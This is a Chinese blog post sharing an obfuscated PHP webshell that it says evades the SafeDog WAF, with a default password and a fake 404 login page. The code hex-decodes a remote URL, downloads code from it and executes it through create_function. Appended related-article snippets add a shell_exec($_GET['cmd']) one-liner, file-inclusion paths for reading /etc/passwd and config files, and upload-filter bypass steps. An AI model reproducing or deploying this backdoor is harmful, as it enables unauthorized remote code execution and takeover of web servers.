绕过安全狗狗的WebShell for PHP

最近发现一款过狗shell,分享下。。。

?
?

本地搭建2008SERVER+php5+阿帕奇+网站安全狗+服务器安全狗+防护全开

测试可用。。。

默认密码:p0tt1


使用方法
:

访问webshell页面,出现404,没关系,按p键,输入密码

或者webshell.php?password=p0tt1
自定义密码在

p0tt1为设定的密码,可以自行修改。


1


<?php?define(‘iphp‘,‘p0tt1‘);define(‘T‘,‘H*‘);define(‘A‘,‘call‘);define(‘B‘,‘user‘);define(‘C‘,‘func‘);define(‘D‘,‘create‘);define(‘E‘,‘function‘);define(‘F‘,‘file‘);define(‘F1‘,‘get‘);define(‘F2‘,‘contents‘);define(‘P‘,‘pack‘);$p?=?P;$call?=?sprintf(‘%s_%s_%s‘,A,B,C);$create?=?sprintf(‘%s_%s‘,D,E);$file?=?sprintf(‘%s_%s_%s‘,F,F1,F2);$t?=?array(‘6‘,‘8‘,‘7‘,‘4‘,‘7‘,‘4‘,‘7‘,‘0‘,‘3‘,‘a‘,‘2‘,‘f‘,‘2‘,‘f‘,‘6‘,‘4‘,‘6‘,‘f‘,‘6‘,‘4‘,‘6‘,‘f‘,‘6‘,‘4‘,‘6‘,‘f‘,‘6‘,‘d‘,‘6‘,‘5‘,‘2‘,‘e‘,‘7‘,‘3‘,‘6‘,‘9‘,‘6‘,‘e‘,‘6‘,‘1‘,‘6‘,‘1‘,‘7‘,‘0‘,‘7‘,‘0‘,‘2‘,‘e‘,‘6‘,‘3‘,‘6‘,‘f‘,‘6‘,‘d‘,‘2‘,‘f‘,‘6‘,‘7‘,‘6‘,‘5‘,‘7‘,‘4‘,‘6‘,‘3‘,‘6‘,‘f‘,‘6‘,‘4‘,‘6‘,‘5‘,‘2‘,‘e‘,‘7‘,‘0‘,‘6‘,‘8‘,‘7‘,‘0‘,‘3‘,‘f‘,‘6‘,‘3‘,‘6‘,‘1‘,‘6‘,‘c‘,‘6‘,‘c‘,‘3‘,‘d‘,‘6‘,‘3‘,‘6‘,‘f‘,‘6‘,‘4‘,‘6‘,‘5‘);$call($create(null,$p(T,$file($p(T,join(null,$t))))));?>

?
?

伪装的404页面

?
?

按P键输入密码

?
?

成功进入webshell

?
?

?码字很辛苦,转载请注明来自SniFFeR.Pro《绕过安全狗狗的WebShell for PHP》http://www.sniffer.pro/post/5.html

时间: 2024-10-11 16:38:19

绕过安全狗狗的WebShell for PHP的相关文章

《Web渗透技术及实战案例解析》pdf

下载地址:网盘下载 内容简介 编辑 本书从Web渗透的专业角度,结合网络安全中的实际案例,图文并茂地再现Web渗透的精彩过程.本书共分7章,由浅入深地介绍和分析了目前网络流行的Web渗透攻击方法和手段,并结合作者多年的网络安全实践经验给出了相对应的安全防范措施,对一些经典案例还给出了经验总结和技巧,通过阅读本书可以快速掌握目前Web渗透的主流技术.本书最大的特色就是实用和实战性强,思维灵活.内容主要包括Web渗透必备技术.Google黑客技术.文件上传渗透技术.SQL注入.高级渗透技术.0day

文件包含漏洞利用

文件包含可以利用的方式 (1) 直接进行文件的遍历读取:(读取敏感信息) 在获悉中间件 IIS.apache与第三方集成包等程序默认安装路径的情况,可以直接利用文件包含结合目录遍历进行"配置文件的读取" include.php?file=../../../etc/pass include.php?file=../../../xampp/htdocs/config.php (2)解析符合php规范的任何文件:(本地包含配合文件上传) 可以利用文件包含函数可以解析任何符合PHP规范的文件的

【安全牛学习笔记】&#8203;手动漏洞挖掘(四)

手动漏洞挖掘 本地文件包含lfi 查看文件 代码执行 <?php echo shell_exec($_GET['cmd']);?> Apache access.log 远程文件包含rfi 出现概率少于lfi,但更容易被利用 /usr/share/wfuzz/wordlist/vulns/ 手动漏洞挖掘 文件上传漏洞 <?php echo shell_exec($_GET['cmd']);?> 直接上传webshell 修改文件类型上传webshell Mimetype----文件头

代码安全之上传文件

上传数据包 从数据包中可以看出,验证文件类型的参数有:Content-Type.Filename.Filedata. 客户端JS验证 原理介绍 通过JS验证上传文件类型是最不安全的做法,因为这个方式是最容易被绕过的.我们先来看下JS实现文件检测的代码如下: 客户端JS验证通常做法是验证上传文件的扩展名是否符合验证条件. 绕过姿势 1 通过firefox的F12修改js代码绕过验证 2 使用burp抓包直接提交,绕过js验证 服务端MIME类型检测 MIME类型介绍 不同的文件类型有不同的MIME

[ 墨者学院 ] 文件上传 —— 内部文件上传系统漏洞分析

题目简介: 背景介绍 在为某公司检测后台页面时,你发现了一个上传页面,该页面做了一些防护,你需要尝试绕过并上传webshell,以获得网站根目录访问权限 实训目标 1.熟悉常见中间件存在的解析漏洞:2.熟悉一句话木马的使用与制作3.熟悉常见的上传漏洞利用方法 解题方向 1.试探允许上传的文件类型2.观察服务器在处理完上传任务后返回的内容,获取上传路径3.尝试修改上传路径,观察服务器是否允许写入权限 解题过程: 1.打开靶机环境 2.通过上传界面的源代码,可以看出此站点环境是asp. 3.这里上传

绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法. 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测. 废话不多说,切入正题.... 1.实验环境: Windows Server 2003. Apache/2.4.18.PHP/5.3.29.网站安全狗(Apache版)V3.5.12048 2.用于文件上传的PHP源码: <?php $path = dirname(__FILE__) . '/upload/'; $rand = rand(0,30);

Webshell免杀绕过waf

0x01 前言# 尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧 0x02 目录# 关于eval 于 assert 字符串变形 定义函数绕过 回调函数 回调函数变形 特殊字符干扰 数组 类 编码绕过 无字符特征马 PHP7.1后webshell何去何从 总结 0x03 关于eval 于 assert# 关于eval函数在php给出的官方说明是 eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号()

[9期]软WAF上传绕过+webshell免杀

安全狗上传绕过 思路: 1.扰乱编码 form-data 替换成 ~form-data           form-data    改成 f+orm-data form-data    改成 form-d+ata          form-data   替换成   " filename="xxx"   改成  filename=xxx; 增减空格 对Content-Disposition,Content-Type,name,filename,form-data http参

绕过图片格式限制上传木马获取WebShell

思路: 图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php 可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示, 记录下来后用菜刀连接即可. (1)网站要求上传png格式的文件 (2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功. Content-Disposition: form-data; name="fun_menu_icon" test123tro